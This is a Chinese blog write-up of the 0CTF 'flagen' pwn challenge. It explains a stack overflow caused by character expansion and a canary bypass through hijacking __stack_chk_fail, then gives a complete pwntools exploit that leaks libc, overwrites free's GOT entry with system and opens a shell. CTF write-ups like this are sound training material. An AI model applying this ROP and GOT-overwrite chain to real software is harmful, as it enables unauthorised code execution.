flagen

最新推荐文章于 2023-05-26 08:54:00 发布
最新推荐文章于 2023-05-26 08:54:00 发布
阅读量651 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/88369423
版权

题目
提取码:g36p

ida静态分析

找到sub_80488C6()函数中存在一个漏洞点。

      case 0x48:
      case 0x68:
        v4 = v15;
        v5 = v15 + 1;
        *v4 = 0x31;
        *v5 = 0x2D;
        v6 = v5 + 1;
        v15 = v5 + 2;
        *v6 = 0x31;
        break;

这部分代码将我们输入的flag转换后会变长,存在溢出漏洞。
但仅仅有这个还不行,因为这个程序存在canary,所以我们必须要解除canary。
在这里面有个十分巧妙的地方
在这里插入图片描述
如果我们构造的payload合适的话,可以用 __stack_chk_fail的地址将参数给覆盖,从而使得我们可以控制 __stack_chk_fail,去掉检查。

然后还需要注意的就是payload中会有\x00截断,所以我们需要找到一个合适的输入函数。使用文件中自己编写的输入函数,覆盖参数(注意\x00截断)
在这里插入图片描述
exp

from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']


elf=ELF('./flagen')

def input(p,input):
    p.sendlineafter(': ','1')
    p.sendline(input)

def up(p):
    p.sendlineafter(': ','2')

def low(p):
    p.sendlineafter(': ','3')

def change(p):
    p.sendlineafter(': ','4')

def addprefix(p):
    p.sendlineafter(': ','5')

def prin(p):
    p.sendlineafter(': ','6')

def exit(p):
    p.sendlineafter(': ','7')

puts=0x08048510
ret=0x0804846a
stack_check=0x0804B01C
pop_1=0x08048481
pop_2=0x08048b00
pop_3=0x08048d8d
bss=0x804b144+0x8
a=0x08048F60
read=0x080486CB

p=process('./flagen')
payload=p32(ret)+'h'*0x55+'a'*8+'a'*5+p32(pop_1)+p32(stack_check)
payload+=p32(puts)+p32(pop_1)+p32(elf.got['free'])
payload+=p32(read)+p32(pop_3)+p32(bss+0x100)+p32(0x6fffffff)+p32(0xffffffff)
payload+=p32(read)+p32(pop_3)+p32(elf.got['free'])+p32(0x6fffffff)+p32(0xffffffff)
payload+=p32(elf.plt['free'])+p32(pop_1)+p32(bss+0x100)
input(p,payload)
change(p)
alarm=u32(p.recv()[4:8].ljust(4,'\x00'))

libc=LibcSearcher('alarm',alarm)
system=alarm-libc.dump('alarm')+libc.dump('system')
malloc_hook=alarm-libc.dump('alarm')+libc.dump('__malloc_hook')
print('malloc_hook',hex(malloc_hook))
p.sendline('/bin/sh\x00')
p.sendline(p32(system))
p.sendline('ls')
p.interactive()
p.close()
Maxmalloc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf flagen writeup
ling
04-12 1959
溢出点: 在leetify的处理中,程序将h转化为1-1,一个字符变成了三个字符。但是空间没有增加,存在栈溢出。 利用: 程序有栈canary保护,最开始想着找方法泄露出canary。看栈上有残留的canary存在,然后就使劲找泄露方法,奈何所有的处理函数中,字符串的末尾都添加上了\x00,因此没办法泄露。 后来考虑栈溢出能覆盖些什么。栈canary、返回值、函数参数。函数的参数刚
浅谈Flag模式
灵魂里的香气
10-23 964
讲Flag之前,先有一个概念,taskAffinity(任务栈亲和力)。taskAffinity跟Flag是配合使用的。我们在manifest清单文件中给某些activity的标签设置上这个属性,后面跟的值是包名,那么就使得这些activity在同一个任务栈中(即taskID是相同的)。1.FLAG_ACTIVITY_NEW_TASK模式(要求在不同应用中使用)1.1概念:这个标志通常会启动一个新的
[pwn]ROP:三道题讲解花式绕过Canary栈保护
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
Neepu2023-部分Reserve复现
最新发布
m0_73393932的博客
05-26 808
逆向
毕业设计实战:单片机智能温控风扇设计 带智能调速人体感应 论文仿真 源码 原理图
从零开始学单片机的博客
02-15 7440
51单片机做的温空风扇 数码管显示 带人体感应模块,实现智能调速,功能非常强大,这是一个本科的毕业设计,毕业论文 开题报告 源码 原理图 还有proteus仿真等等都是一应俱全. 还有答辩常见问题解答,焊接注意事项和调试讲解,以及详细的制作过程. 温空风扇实物图: 智能风扇仿真截图: 温空风扇的DXP格式 protel99格式 温控风扇原理图: DXP格式用 Alti...
ELF中PLT和GOT工作机制简介-可还原
badman250的专栏
05-03 2098
以实际的Hello World小程序为例子,作为动态库的学习材料。 开章上个图,看完明白这个图。 1.编译过程 以最简单的 Hello world为例 #include <stdio.h> int main() { printf("hello, world\n"); return 0; } ...
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 3833
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
初学FPGA——状态机
gouyepeng的博客
04-12 846
@[仅记录FPGA学习过程中的点点滴滴,欢迎交流与指正] 基础知识 状态机全称是有限状态机(Finite State Machine,FSM ),是一种在有限个状态之间按一定规律转换的时序电路,可以认为是组合逻辑和时序逻辑的一种组合。状态机通过控制各个状态的跳转来控制流程,使得整个代码看上去更加清晰易懂,在控制复杂流程的时候,状态机优势明显,因此基本上都会用刀状态机。 状态机功能: 描述系统逻辑功能。 定义系统的不同状态。 描述系统转化的条件及转化过程。 刻画系统状态和输入输出之间的关系。 状态机的.
[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持
weixin_34133829的博客
02-20 628
本题为Linux栈溢出漏洞的利用,考查Linux Canary绕过技术及ROP(Return-Oriented-Programming)攻击负载的构造。 0x01 Linux Canary介绍首先了解一下Linux的Canary保护机制。Canary是Linux众多安全保护机制中的一种,主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的...
逐字逐句解析ucos ii 源代码-》OS_FLAG
一条狗的自我修养
02-16 2155
//BY 简单的元清 //部分内容引用了其他博主的文章,对这些博主表示感谢,时间关系就不一一指出了。 //如有转载,请说明,谢谢/* ********************************************************************************************************* * ...
2017陕西赛pwn_box_Writeup
ACdream
04-27 638
题目链接:BIN的Magical_Box 格式化字符串泄露Canary和libc地址 缓冲区溢出提权 from pwn import * Local = False if Local: io = process('./pwn_box') libc = ELF('/lib/i386-linux-gnu/libc.so.6') elf = ELF('
UCOSIII事件标志组
超哥的专栏
01-02 874
两种同步机制 “或”同步 “与”同步 使能#define OS_CFG_FLAG_EN 1u /* Enable (1) or Disable (0) code generation for EVENT FLAGS */主结构体typedef struct os_flag_grp OS_FLAG_GRP; struct os_flag_grp {
攻防世界-Reverse-666(图解详细)
半岛铁盒的博客
12-03 3603
自述 这道题对于新手来说还是比较经典的,把逆向与python脚本的编写联系了起来;因为刚开始我没有学python,一遇到脚本什么的就很懵,学了半个月python后,我对做题有个更深的认识,记录一下; 解题 把文件放入IDA 找到main函数, 这一段很短却提供了很多的信息; 意思是:输入一串字符,进入encode(点进去发现是一个加密函数) 再往下走,长度与key相比较,要求长度等于key,再往下走,把加密后的字符与enflag相比较,两者相等 **一.**先点进key看看; 有两个信息 1. key
2021东华杯misc详解
热门推荐
Demodd的博客
11-04 5万+
前言 本次比赛还是发现了自己很多问题,希望以后能改善吧。。。 签到 +AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- utf-7编码http://toolswebtop.com/text/process/decode/UTF-7 flag{dhb_7th} project 题目附件发现是工程文件,按日期排序只有一个新的exe文件,那考点肯定就在这了 运行exe生成了一个zip 打开解压缩的文件发现有三部分编码 base64 quoted-printable base64转
很经典的一个Re题目
Mr_Corazon的博客
03-11 347
很明显encode有问题 进去看看 查看key长度是18于enflag的长度一样 查看enflag里面东西是 把这一串字符用ASCII解密出来 编写python脚本得到flag` enflag=[105, 122, 119, 104, 114, 111, 122, 34, 34, 119, 34, 118, 46, 75, 34, 46, 78, 105, 0] flag=’’ for i in range(0,18,3): flag+=chr((18^enflag[i])-6) flag+=chr.
gdb 调试 PIE程序
Maxmalloc的博客
01-08 3160
方法1 可以安装gdb的pwndbg插件 使用 b *$rebase(0x相对基址偏移) 方法二 可以先找到pie $ ps -aux|grep task_shoppingCart hu 6158 0.0 0.0 4356 632 pts/18 S+ 07:50 0:00 ./task_shoppingCart hu 6162 0.0 ...
pwn题中 setbuf的用处
Maxmalloc的博客
10-14 2647
在我们遇到的每一个需要输入输出的pwn题中一般都会有下面这几条语句 setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stderr, 0LL, 2, 0LL); 直到今天才彻底搞明白这三句话的作用。 因为我们搭建pwn题一般都是用socat进行端口转发,pwn题搭建详情 但是socat不是一次写一行而...
onegadget不起作用
Maxmalloc的博客
10-13 2544
one_gadget的执行是需要一些条件的 0x45216 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4526a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf02a4 execve("/bin/sh",...
linux 之pwn环境建立
Maxmalloc的博客
11-03 1818
当电脑建立相关环境遇到一些麻烦后,如何重新快速搭建pwn相关的linux环境是个重要的的问题,写篇博客给自己记一下 1.设置root密码 sudo passwd root 2.安装pip sudo apt-get install python-pip 3.安装pwntools pip install pwntools 4.转储ida server(方便ida远程调试) 5.安装LibcSear...
2018 安恒杯 6 月 pwn - over
Maxmalloc的博客
10-06 1757
题目链接 找不到了 先用ida分析一下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); while ( sub_400676() ) ; return 0LL; } int su...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值